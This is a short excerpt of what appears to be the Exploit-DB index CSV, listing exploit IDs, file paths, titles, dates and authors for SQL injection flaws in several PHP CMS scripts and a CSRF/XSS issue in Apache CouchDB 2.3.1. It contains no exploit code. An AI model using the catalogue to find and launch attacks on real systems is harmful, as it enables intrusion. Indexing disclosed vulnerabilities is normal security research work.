46592,exploits/php/webapps/46592.txt,"Meeplace Business Review Script - 'id' SQL Injection",2019-03-22,"Ahmet Ümit BAYRAM",webapps,php,80 46592,exploits/php/webapps/46592.txt,"Meeplace Business Review Script - 'id' SQL Injection",2019-03-22,"Ahmet Ümit BAYRAM",webapps,php,80
46593,exploits/php/webapps/46593.txt,"Inout Article Base CMS - SQL Injection",2019-03-22,"Ahmet Ümit BAYRAM",webapps,php,80 46593,exploits/php/webapps/46593.txt,"Inout Article Base CMS - SQL Injection",2019-03-22,"Ahmet Ümit BAYRAM",webapps,php,80
46595,exploits/multiple/webapps/46595.txt,"Apache CouchDB 2.3.1 - Cross-Site Request Forgery / Cross-Site Scripting",2019-03-25,"Ozer Goker",webapps,multiple,
46597,exploits/php/webapps/46597.txt,"Jettweb PHP Hazır Haber Sitesi Scripti V1 - SQL Injection",2019-03-25,"Ahmet Ümit BAYRAM",webapps,php,80
46598,exploits/php/webapps/46598.txt,"Jettweb PHP Hazır Haber Sitesi Scripti V2 - SQL Injection (Authentication Bypass)",2019-03-25,"Ahmet Ümit BAYRAM",webapps,php,80
46599,exploits/php/webapps/46599.txt,"Jettweb PHP Hazır Haber Sitesi Scripti V3 - SQL Injection",2019-03-25,"Ahmet Ümit BAYRAM",webapps,php,80
46602,exploits/php/webapps/46602.txt,"Zeeways Jobsite CMS - 'id' SQL Injection",2019-03-25,"Ahmet Ümit BAYRAM",webapps,php,80
46603,exploits/php/webapps/46603.txt,"Zeeways Matrimony CMS - SQL Injection",2019-03-25,"Ahmet Ümit BAYRAM",webapps,php,80

Can't render this file because it is too large.